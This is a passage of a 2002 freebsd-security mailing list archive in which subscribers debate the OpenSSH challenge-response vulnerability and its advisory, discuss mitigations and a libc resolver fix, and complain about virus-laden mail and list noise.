Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org < said: > Which reminds me that we should really tweak the code and put it in a > jail instead of a chroot. Something I'd really love to see, and I hope that the TrustedBSD work will eventually make it easier to implement this, is a gensym mechanism for UIDs. That is to say, I'd like a process which is trying to reduce privilege to be able to get a UID which is guaranteed to be distinct from any other UID on the system. The number itself doesn't have to be unique, but the result of calling setuniqueuid() would be to set a flag in the process credentials causing all DAC permission checks to fail. (This could be implemented as a MAC policy that simply says ``no'' to every request from such a process.) -GAWollman To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 13:41:32 2002 Delivered-To: freebsd-security@freebsd.org Received: from archive.e-u-a.net (rrcs-midsouth-24-199-181-242.biz.rr.com [24.199.181.242]) by hub.freebsd.org (Postfix) with ESMTP id 69F4937C7C5 for ; Wed, 26 Jun 2002 12:59:00 -0700 (PDT) Received: from armageddon (24-197-196-76.man.mn.charter.com [24.197.196.76]) by archive.e-u-a.net (8.12.1/8.12.1) with ESMTP id g5QJjt5n011361; Wed, 26 Jun 2002 15:45:55 -0400 (EDT) (envelope-from ecrist@adtechintegrated.com) From: "Eric F Crist" To: "'David Wilk'" , Subject: RE: Viruses attaahce to emails in this mailing list Date: Wed, 26 Jun 2002 14:53:45 -0500 Message-ID: <001e01c21d4b$31f44540$6501a8c0@armageddon> MIME-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.2616 In-Reply-To: <20020626111451.A10404@cygnus.wks.Gallup.cia-g.com> X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I don't exactly consider myself a Unix Guru, but I do know my way around quite well, and use it religiously. However, I do send from MS Outlook as I still enjoy some of the functionality that Microsoft Office provides. I hope this honesty doesn't offend anyone... Eric F Crist President/Sys Admin AdTech Integrated Systems, Inc http://www.adtechintegrated.com -----Original Message----- From: owner-freebsd-security@FreeBSD.ORG [mailto:owner-freebsd-security@FreeBSD.ORG] On Behalf Of David Wilk Sent: Wednesday, June 26, 2002 12:15 PM To: freebsd-security@FreeBSD.ORG Subject: Re: Viruses attaahce to emails in this mailing list Beware us from self-proclaimed 'UnixGurus' sending mail from Outlook Express... On Wed, Jun 26, 2002 at 01:37:23PM +0200 or thereabouts, Haakan Olofsson wrote: > damnit > > cant you block attachments in this mailinglist, im getting tired of getting > virii's in the mail > > > Regards > > Olofson > > Beware us from the LiNUX penguin!!!! > > , , > /( )` Olofson > \ \___ / | SystemEngineer/UnixGuru > /- _ `-/ ' > (/\/ \ \ /\ > / / | ` \ > O O ) / | > `-^--'`< ' > (_.) _ ) / > `.___/` / > `-----' / > <----. __ / __ \ > <----|====O)))==) \) /==== > <----' `--' `.__,' \ olofson@dax.net > | | > \ / > ______( (_ / \_____ > ,' ,-----' | \ > `--{__________) \/ > > `--{__________) \/ > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- ******************************* David Wilk System Administrator Community Internet Access, Inc. admin@cia-g.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 13:43: 2 2002 Delivered-To: freebsd-security@freebsd.org Received: from electricrain.com (electricrain.com [64.71.143.226]) by hub.freebsd.org (Postfix) with ESMTP id AB97E37CBA3 for ; Wed, 26 Jun 2002 13:20:57 -0700 (PDT) Received: (qmail 9381 invoked by uid 540); 26 Jun 2002 20:20:57 -0000 Date: Wed, 26 Jun 2002 13:20:57 -0700 From: Chris Doherty To: freebsd-security@freebsd.org Subject: Re: Wow Message-ID: <20020626202057.GA7152@zot.electricrain.com> Reply-To: chris-freebsd@randomcamel.net References: <20020626121754.F8071@mail.seattleFenix.net> <200206261919.g5QJJLLI018466@cvs.openbsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <200206261919.g5QJJLLI018466@cvs.openbsd.org> User-Agent: Mutt/1.4i X-Operating-System: XEmacs X-Koan: mu. Organization: The Inside Foundation Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At some point, Theo de Raadt said: > I've barely slept in a week. get some rest. > So many of you are being totally unreasonable people. well. "Upgrade now." "What versions are vulnerable?" "Upgrade now." "*sigh* Okay, I'll upgrade my 40 production machines." "Okay, the version in -stable is unaffected. Oh yeah, and even if you're running a vulnerable version, set 'ChallengeResponseAuthentication no' and you'll be fine." people aren't being unreasonable. they just wasted a lot of time upgrading to a new version of software, when in reality probably 95% of cases are either not vulnerable or can be secured with a simple configuration file change (I made that number up, of course, but at least on this list it doesn't seem out of proportion). for myself with my one machine, I'm just annoyed. if I had gone through this bullshit on 40 machines, when I could have just modified a config file, I'd be pissed, and rightfully so. but, *shrug*. I'll not give such credence to vague warnings in the future--lesson learned. Chris ------------------------------- Chris Doherty chris [at] randomcamel.net "I think," said Christopher Robin, "that we ought to eat all our provisions now, so we won't have so much to carry." -- A. A. Milne ------------------------------- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 13:44: 6 2002 Delivered-To: freebsd-security@freebsd.org Received: from mail.fpsn.net (mail.fpsn.net [63.224.69.57]) by hub.freebsd.org (Postfix) with ESMTP id C48E737CDD9 for ; Wed, 26 Jun 2002 13:31:31 -0700 (PDT) Received: from fpsn.net (mirc-sucks@unixgr.com [63.224.69.60]) (authenticated) by mail.fpsn.net (8.11.6/8.11.6) with ESMTP id g5QKVGV71603; Wed, 26 Jun 2002 14:31:16 -0600 (MDT) Message-ID: <3D1A249A.28B3C57D@fpsn.net> Date: Wed, 26 Jun 2002 14:31:22 -0600 From: Colin Faber Organization: fpsn.net, Inc. (http://www.fpsn.net) X-Mailer: Mozilla 4.78 [en] (Windows NT 5.0; U) X-Accept-Language: en MIME-Version: 1.0 To: Brett Glass Cc: Benjamin Krueger , Mike Tancsa , Darren Reed , freebsd-security@FreeBSD.ORG Subject: Re: The "race" that Theo sought to avoid has begun (Was:OpenSSH Advisory) References: <4.3.2.7.2.20020626101626.02274c80@localhost> <200206261452.AAA26617@caligula.anu.edu.au> <5.1.0.14.0.20020626103651.048ec778@marble.sentex.ca> <5.1.0.14.0.20020626110043.0522ded8@marble.sentex.ca> <4.3.2.7.2.20020626101626.02274c80@localhost> <4.3.2.7.2.20020626103956.02291aa0@localhost> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I was under the impression that "Security through Obscurity" was no way to secure a system. Has this changed at some point in the last month or so? Brett Glass wrote: > > At 10:35 AM 6/26/2002, Benjamin Krueger wrote: > > > Minimized harm? The great majority of systems are (were) not vulnerable. > > Not true at all. OpenBSD, NetBSD, and most recent Linux distributions were > and are vulnerable. > > >As for the start of the race? It started the minute Theo's notice hit bugtraq. > > No, it didn't. The skript kiddies didn't know where the bug was. > > > Had he said "Use PrivSep or disable ChallengeResponseAuthentication" anyone > >who *was* vulnerable could have been secured in about 24 seconds. > > He DID say to use PrivSep. He did not say to disable > ChallengeResponseAuthentication for a reason: it would have clued the kiddies > into the location of the bug. > > >Somehow, I > >don't think that the script kiddies could can find the vulnerability from > >such minimal information, > > Mentioning ChallengeResponseAuthentication would have been a big hint. > > > I won't even start on how much industry time (and thus, money) was wasted > >while administrators upgraded (many needlessly) their servers. > > Most needed to upgrade. FreeBSD's releases appear to have dodged the bullet > by sheer luck. > > --Brett > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- Colin Faber (303) 736-5160 fpsn.net, Inc. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 13:44:42 2002 Delivered-To: freebsd-security@freebsd.org Received: from mail.fpsn.net (mail.fpsn.net [63.224.69.57]) by hub.freebsd.org (Postfix) with ESMTP id DB59137CB2C for ; Wed, 26 Jun 2002 13:18:02 -0700 (PDT) Received: from fpsn.net (mirc-sucks@unixgr.com [63.224.69.60]) (authenticated) by mail.fpsn.net (8.11.6/8.11.6) with ESMTP id g5QKHwV71516 for ; Wed, 26 Jun 2002 14:17:58 -0600 (MDT) Message-ID: <3D1A217C.65F73770@fpsn.net> Date: Wed, 26 Jun 2002 14:18:04 -0600 From: Colin Faber Organization: fpsn.net, Inc. (http://www.fpsn.net) X-Mailer: Mozilla 4.78 [en] (Windows NT 5.0; U) X-Accept-Language: en MIME-Version: 1.0 Cc: freebsd-security@FreeBSD.ORG Subject: Re: Fw: love speaks from the heart ! References: <0GYB004A27ABNC@mxout2.netvision.net.il> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Can you please ban .netvision.net.il now? This is the 5th/6th time I've seen this garbage from this host. Hotel Shefayim wrote: -- Colin Faber (303) 736-5160 fpsn.net, Inc. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 13:45:39 2002 Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id 31C8537CB77 for ; Wed, 26 Jun 2002 13:20:00 -0700 (PDT) Received: from fledge.watson.org (fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.12.3/8.12.3) with SMTP id g5QKJvw6016648; Wed, 26 Jun 2002 16:19:57 -0400 (EDT) (envelope-from robert@fledge.watson.org) Date: Wed, 26 Jun 2002 16:19:56 -0400 (EDT) From: Robert Watson X-Sender: robert@fledge.watson.org To: Jamie Norwood Cc: freebsd-security@freebsd.org Subject: Re: Wow In-Reply-To: <20020626190727.GA63047@mushhaven.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, 26 Jun 2002, Jamie Norwood wrote: > Or else, 'Use the fucking code and get off that extremely high horse > before you hurt yourself'. Hey, let's not turn freebsd-security into any more of a cesspool than it already is. I barely read the list as it is due to the incredible noise level, and under the circumstances, I'd really rather I did read the list :-). I appreciate that everyone is interested in what is going on here, but it sounds like most people have already said what they're going to say, and there are far more useful things we could be talking about. If people want to do something useful, looking for nits in our integration of the new OpenSSH code in -CURRENT would be useful, as we're in the process of merging to -STABLE and catching the nits sooner rather than later would really be preferred. In particular, looking for any issues with PAM would be useful, and with non-default authentication types (hardware authentication tokens, kerberos, etc). Robert N M Watson FreeBSD Core Team, TrustedBSD Projects robert@fledge.watson.org Network Associates Laboratories To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 13:46:28 2002 Delivered-To: freebsd-security@freebsd.org Received: from omta01.mta.everyone.net (sitemail3.everyone.net [216.200.145.37]) by hub.freebsd.org (Postfix) with ESMTP id 85E0837CC18; Wed, 26 Jun 2002 13:22:34 -0700 (PDT) Received: from sitemail.everyone.net (dsnat [216.200.145.62]) by omta01.mta.everyone.net (Postfix) with ESMTP id 8C2071C3F58; Wed, 26 Jun 2002 12:20:09 -0700 (PDT) Received: by sitemail.everyone.net (Postfix, from userid 99) id 2A8C1274E; Wed, 26 Jun 2002 12:20:09 -0700 (PDT) Content-Type: text/plain Content-Disposition: inline Content-Transfer-Encoding: 7bit Mime-Version: 1.0 X-Mailer: MIME-tools 5.41 (Entity 5.404) Date: Wed, 26 Jun 2002 12:20:05 -0700 (PDT) From: Muhammad Faisal Rauf Danka To: Theo de Raadt Cc: freebsd-security@freebsd.org Subject: Re: Wow Reply-To: mfrd@attitudex.com X-Originating-Ip: [202.5.134.230] Message-Id: <20020626192009.2A8C1274E@sitemail.everyone.net> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org privsep on privsep off wtf ? makeup your mind. do everyone a favour, let us all keep our openssh off for a few weeks, or we could firewall them, or use telnet for that matter temporarily and even if some of us do run openssh openly then it's their responsibility if they get hacked. AND YOU IN THE MEANWHILE should take some rest and release a version which will probably wont be found vulnerable atleast untill next 2 - 3 months. PLEASE!! Please, instead of wasting time in rants against you on mailing lists, and then replying them and then releasing improper advisories with no technical details and ordering people to just update cause you said so, you better be off focusing more at the code. (no offence) Regards, --------- Muhammad Faisal Rauf Danka Chief Technology Officer Gem Internet Services (Pvt) Ltd. web: www.gem.net.pk Vice President Pakistan Computer Emergency Responce Team (PakCERT) web: www.pakcert.org Chief Security Analyst Applied Technology Research Center (ATRC) web: www.atrc.net.pk --- Theo de Raadt wrote: >> On Wed, Jun 26, 2002 at 11:41:03AM -0600, Theo de Raadt wrote: >> > Man, you guys sure do talk shit a lot. But anyways, that is hardly >> > surprising or news. >> > >> > I do have a question though. >> > >> > Did any of you get broken in via this hole yet? >> >> Nope. Just wasted a good part of yesterday upgrading 60 boxes >> from a non-vulnerable version of OpenSSH to a version with a now >> known remote exploit. >> >> I think the PR for this issue could have been a bit better... > >We also did 5600 lines of further security auditing work over the last >week. We're fairly convinced that some of the things we changed are >relevant as well. ie. more holes. > >And that is commited in 3.4 > >By all means. Please continue running what you have. Don't upgrade >to 3.4. And please turn privsep off. > >Or, please, use someone else's software. > >Please. _____________________________________________________________ --------------------------- [ATTITUDEX.COM] http://www.attitudex.com/ --------------------------- _____________________________________________________________ Promote your group and strengthen ties to your members with email@yourgroup.org by Everyone.net http://www.everyone.net/?btn=tag To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 13:47: 8 2002 Delivered-To: freebsd-security@freebsd.org Received: from web10108.mail.yahoo.com (web10108.mail.yahoo.com [216.136.130.58]) by hub.freebsd.org (Postfix) with SMTP id 8976237CBB4 for ; Wed, 26 Jun 2002 13:21:03 -0700 (PDT) Message-ID: <20020626202103.89105.qmail@web10108.mail.yahoo.com> Received: from [68.5.49.41] by web10108.mail.yahoo.com via HTTP; Wed, 26 Jun 2002 13:21:03 PDT Date: Wed, 26 Jun 2002 13:21:03 -0700 (PDT) From: twig les Subject: Re: Wow To: Petr Swedock , tstevenson@mavericck.com Cc: freebsd-security@freebsd.org In-Reply-To: <863cv9algf.fsf@blade-runner.mit.edu> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Could you guys *not* CC the list? Please? Argue your points however you want (and some are very good), but this is annoying. --- Petr Swedock wrote: > > > Travis Stevenson writes: > > > > > Wow, slow down a little. He just wanted to know > if this has affected > > anyone. > > Um, no. He asked if anyone was rooted. That's a > little different > from the more general 'affected.' > > Have I been affected? Yes. I spent lots of time > (and even some > lost sleep) trying to get a handle on the risk. Most > of a work > day trying to track down and collate info to see if > I was in > the crosshairs. That's a day I could have spent > doing something > more productive. So I'd say I was affected. That > wasn't his question, > tho', was it? > > > And if you had > > anything to say to him it should have been sent > to him and not to all of > > us. > > Perhaps so. Perhaps not. If you're concerned that > this is 'off-topic' > let me assure you that, while not technical, this is > most certainly > topical to this list: it is a *security list*, not > a 'jump-when-Theo > -says-jump-list'. And that's what I'm saying. If you > don't think > that's topical to this list... > > Petr Swedock > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of > the message ===== ----------------------------------------------------------- Only fools have all the answers. ----------------------------------------------------------- __________________________________________________ Do You Yahoo!? Yahoo! - Official partner of 2002 FIFA World Cup http://fifaworldcup.yahoo.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 13:47:35 2002 Delivered-To: freebsd-security@freebsd.org Received: from r4k.net (r4k.net [212.26.197.210]) by hub.freebsd.org (Postfix) with ESMTP id 864A837CE7F for ; Wed, 26 Jun 2002 13:34:26 -0700 (PDT) Received: from shell.r4k.net (localhost [127.0.0.1]) by r4k.net (Postfix) with ESMTP id 52A6B2302C; Wed, 26 Jun 2002 22:34:25 +0200 (CEST) Received: (from _@localhost) by shell.r4k.net (8.12.4/8.12.2/Submit) id g5QKYODo005393; Wed, 26 Jun 2002 22:34:24 +0200 (CEST) Date: Wed, 26 Jun 2002 22:34:24 +0200 From: Stephanie Wehner <_@r4k.net> To: Petr Swedock Cc: tstevenson@mavericck.com, freebsd-security@freebsd.org Subject: Re: Wow Message-ID: <20020626203424.GA4232@r4k.net> References: <200206261741.g5QHf3LI027927@cvs.openbsd.org> <867kklaneg.fsf@blade-runner.mit.edu> <1025118105.443.8.camel@ech.maverik.com> <864rfpalnc.fsf@blade-runner.mit.edu> <863cv9algf.fsf@blade-runner.mit.edu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <863cv9algf.fsf@blade-runner.mit.edu> User-Agent: Mutt/1.3.25i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, Jun 26, 2002 at 03:28:32PM -0400, Petr Swedock wrote: (now I normally try to stay out of flames, but this is just getting too silly today) > Have I been affected? Yes. I spent lots of time (and even some > lost sleep) trying to get a handle on the risk. Most of a work > day trying to track down and collate info to see if I was in > the crosshairs. That's a day I could have spent doing something > more productive. So I'd say I was affected. That wasn't his question, > tho', was it? So what ?? Please compare the time you spend today, with the time it would have taken you to write your own ssh client. They're generally doing a great job and certainly spent a lot of time now fixing problems. I think the appropriate thing to say is thank you. > Perhaps so. Perhaps not. If you're concerned that this is 'off-topic' > let me assure you that, while not technical, this is most certainly > topical to this list: it is a *security list*, not a 'jump-when-Theo > -says-jump-list'. And that's what I'm saying. If you don't think > that's topical to this list... erks. don't you think you're being a little paranoid, or haunted ? I don't think anyone said jump, but if you can't help yourself please do :) relax, Stephanie --<> _@r4k.net <>------------------<> FreeBSD <>------------------- #3 - Anime Law of Sonic Amplification, First Law of Anime Acoustics In space, loud sounds, like explosions, are even louder because there is no air to get in the way. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 13:48:15 2002 Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id 84E0237B679 for ; Wed, 26 Jun 2002 13:22:18 -0700 (PDT) Received: from fledge.watson.org (fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.12.3/8.12.3) with SMTP id g5QKMGw6016670; Wed, 26 Jun 2002 16:22:16 -0400 (EDT) (envelope-from robert@fledge.watson.org) Date: Wed, 26 Jun 2002 16:22:15 -0400 (EDT) From: Robert Watson X-Sender: robert@fledge.watson.org To: "H. Wade Minter" Cc: freebsd-security@freebsd.org Subject: Re: FreeBSD Security Advisory FreeBSD-SA-02:28.resolv In-Reply-To: <20020626152504.Q45972-100000@bunning.skiltech.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, 26 Jun 2002, H. Wade Minter wrote: > So am I correct in assuming that this fix requires a complete system > rebuild (make buildworld) as opposed to just rebuilding a particular > module? You will catch most applications simply by rebuilding libc and reinstalling. Unfortunately, some applications are statically linked, and they must be individually relinked against the new libc and reinstalled. Since there are a moderate number of statically linked applications that use DNS, the easiest directions simply involved rebuilding the entire system (especially given modern system speed). Once the binary updates are available, there will be a list of the affect binaries if you want to take a more selective approach. Robert N M Watson FreeBSD Core Team, TrustedBSD Projects robert@fledge.watson.org Network Associates Laboratories To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 15:52:21 2002 Delivered-To: freebsd-security@freebsd.org Received: from mail1.infospace.com (mail1.infospace.com [206.29.197.87]) by hub.freebsd.org (Postfix) with SMTP id E1A2737B406 for ; Wed, 26 Jun 2002 15:52:11 -0700 (PDT) Received: (qmail 28679 invoked from network); 26 Jun 2002 22:25:29 -0000 Received: from unknown (HELO skyy.inspinc.ad) (10.100.11.50) by jim.inspinc.ad with SMTP; 26 Jun 2002 22:25:29 -0000 Received: (qmail 15631 invoked from network); 26 Jun 2002 22:25:28 -0000 Received: from unknown (HELO ?10.99.33.65?) ([10.100.29.130]) (envelope-sender ) by skyy.inspinc.ad (qmail-ldap-1.03) with SMTP for ; 26 Jun 2002 22:25:28 -0000 User-Agent: Microsoft-Entourage/10.1.0.2006 Date: Wed, 26 Jun 2002 15:25:27 -0700 Subject: Re: OpenSSH Security (just a question, please no f-war) From: William Carrel To: Brian Nelson Cc: Jan Lentfer , FreeBSD Security Mailling List Message-ID: In-Reply-To: <3D1A3D39.8050603@notgod.com> Mime-version: 1.0 Content-type: text/plain; charset="US-ASCII" Content-transfer-encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On 6/26/02 3:16 PM, "Brian Nelson" wrote: > William Carrel wrote: >> If and only if you have ChallengeResponseAuthentication set to "yes" > > Just to be clear, the default for ChallengeResponseAuthentication is > "yes" so you probably meant "If and only if you *don't* have > ChallengeResponseAuthentication set to 'no'" I intentionally avoided the double negative. You can blame my English teacher if you like. :) :) :) If the default for FooBarOption is "yes" and you have nothing set for it, then you have FooBarOption set to "yes". Or at least that is the way it parses out in my brain. Your language parsing may vary. -- William Carrel | Sr. Systems Engineer | william.carrel@infospace.com InfoSpace INC 601 108th Ave NE | Suite 1200 | Bellevue, WA 98004 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 15:54:59 2002 Delivered-To: freebsd-security@freebsd.org Received: from ds.express.ru (ds.express.ru [212.24.32.7]) by hub.freebsd.org (Postfix) with ESMTP id 7EC4637B412 for ; Wed, 26 Jun 2002 15:52:32 -0700 (PDT) Received: from localhost.express.ru ([127.0.0.1] helo=localhost) by ds.express.ru with esmtp (Exim 2.12 #8) id 17NJkP-000GwR-00 for freebsd-security@FreeBSD.ORG; Thu, 27 Jun 2002 00:50:41 +0400 Date: Thu, 27 Jun 2002 00:50:41 +0400 (MSD) From: Maxim Kozin To: freebsd-security@FreeBSD.ORG Subject: Re: The "race" that Theo sought to avoid has begun (Was: OpenSSH Advisory) In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > Ppl, before you are going crazy, think a little. > Theo did you a favor when he released his letter. Why? Because now all of > you are using privsep, which will hopefully help you if the another 100 > exploits will be released/found in OpenSSH... Not all, because privsep has trouble with some PAM modules, but "ChallengeResponseAuthentication no" work. If we can know this in begin of sshisteria ! b.r. Kozin Maxim To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 16: 0: 7 2002 Delivered-To: freebsd-security@freebsd.org Received: from hyperreal.org (taz3.hyperreal.org [209.133.83.22]) by hub.freebsd.org (Postfix) with SMTP id 2789837B4D6 for ; Wed, 26 Jun 2002 15:54:22 -0700 (PDT) Received: (qmail 8875 invoked from network); 26 Jun 2002 22:27:40 -0000 Received: from localhost.hyperreal.org (HELO yez.hyperreal.org) (127.0.0.1) by localhost.hyperreal.org with SMTP; 26 Jun 2002 22:27:40 -0000 Received: (qmail 24701 invoked by uid 1000); 26 Jun 2002 22:29:45 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 26 Jun 2002 22:29:45 -0000 Date: Wed, 26 Jun 2002 15:29:45 -0700 (PDT) From: Brian Behlendorf To: Robert Watson Cc: freebsd-security@freebsd.org Subject: Re: FreeBSD Security Advisory FreeBSD-SA-02:28.resolv In-Reply-To: Message-ID: <20020626152851.Q310-100000@yez.hyperreal.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-Spam-Rating: localhost.hyperreal.org 1.6.2 900/1000/N Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, 26 Jun 2002, Robert Watson wrote: > You will catch most applications simply by rebuilding libc and > reinstalling. Unfortunately, some applications are statically linked, and > they must be individually relinked against the new libc and reinstalled. Sorry for the newbie question here, but is there a way to programmatically determine which binaries on a system static-linked libc? I tried "nm" but that needs non-stripped executables... Brian To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 16: 9:24 2002 Delivered-To: freebsd-security@freebsd.org Received: from guest.cg.nu (guest.cg.nu [213.196.7.60]) by hub.freebsd.org (Postfix) with ESMTP id 01C9C37B7D6 for ; Wed, 26 Jun 2002 15:59:58 -0700 (PDT) Received: (qmail 25094 invoked by uid 85); 26 Jun 2002 21:25:31 -0000 Received: from unknown (HELO wevers.org) (213.84.69.96) by guest.cg.nu with SMTP; 26 Jun 2002 21:25:29 -0000 Message-ID: <3D1A3153.6000704@wevers.org> Date: Wed, 26 Jun 2002 23:25:39 +0200 From: Henk Wevers User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.0rc2) Gecko/20020512 Netscape/7.0b1 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Robert Watson Cc: freebsd-security@freebsd.org Subject: Re: FreeBSD Security Advisory FreeBSD-SA-02:28.resolv References: Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-Virus-Scanned: by AMaViS perl-11 hosted on guest.cg.nu Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Does this mean that if you just build OpenSSH 3.4.p1, you must build this again with the new world? :( Henk Robert Watson wrote: > On Wed, 26 Jun 2002, H. Wade Minter wrote: > > >>So am I correct in assuming that this fix requires a complete system >>rebuild (make buildworld) as opposed to just rebuilding a particular >>module? > > > You will catch most applications simply by rebuilding libc and > reinstalling. Unfortunately, some applications are statically linked, and > they must be individually relinked against the new libc and reinstalled. > Since there are a moderate number of statically linked applications that > use DNS, the easiest directions simply involved rebuilding the entire > system (especially given modern system speed). Once the binary updates > are available, there will be a list of the affect binaries if you want to > take a more selective approach. > > Robert N M Watson FreeBSD Core Team, TrustedBSD Projects > robert@fledge.watson.org Network Associates Laboratories > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 16:18:36 2002 Delivered-To: freebsd-security@freebsd.org Received: from home.24cl.com (174.113.sn.ct.dsl.thebiz.net [216.238.113.174]) by hub.freebsd.org (Postfix) with ESMTP id 6113537B845 for ; Wed, 26 Jun 2002 16:01:20 -0700 (PDT) Received: from winbloat (winbloat.24cl.home [10.0.1.10]) by home.24cl.com (Postfix) with ESMTP id 20AB82B28A for ; Wed, 26 Jun 2002 19:00:42 -0400 (EDT) Message-ID: <200206261900420207.007ECB88@sentry.24cl.com> In-Reply-To: <4.3.2.7.2.20020626123409.02291bf0@localhost> References: <4.3.2.7.2.20020626121804.022dc1b0@localhost> <4.3.2.7.2.20020626115517.022108b0@localhost> <4.3.2.7.2.20020626101626.02274c80@localhost> <200206261452.AAA26617@caligula.anu.edu.au> <5.1.0.14.0.20020626103651.048ec778@marble.sentex.ca> <5.1.0.14.0.20020626110043.0522ded8@marble.sentex.ca> <4.3.2.7.2.20020626101626.02274c80@localhost> <20020626132416.A42340@unixdaemons.com> <4.3.2.7.2.20020626115517.022108b0@localhost> <20020627041540.U89115@zeus.theinternet.com.au> <4.3.2.7.2.20020626121804.022dc1b0@localhost> <4.3.2.7.2.20020626123409.02291bf0@localhost> X-Mailer: Calypso Version 3.20.01.01 (4) Date: Wed, 26 Jun 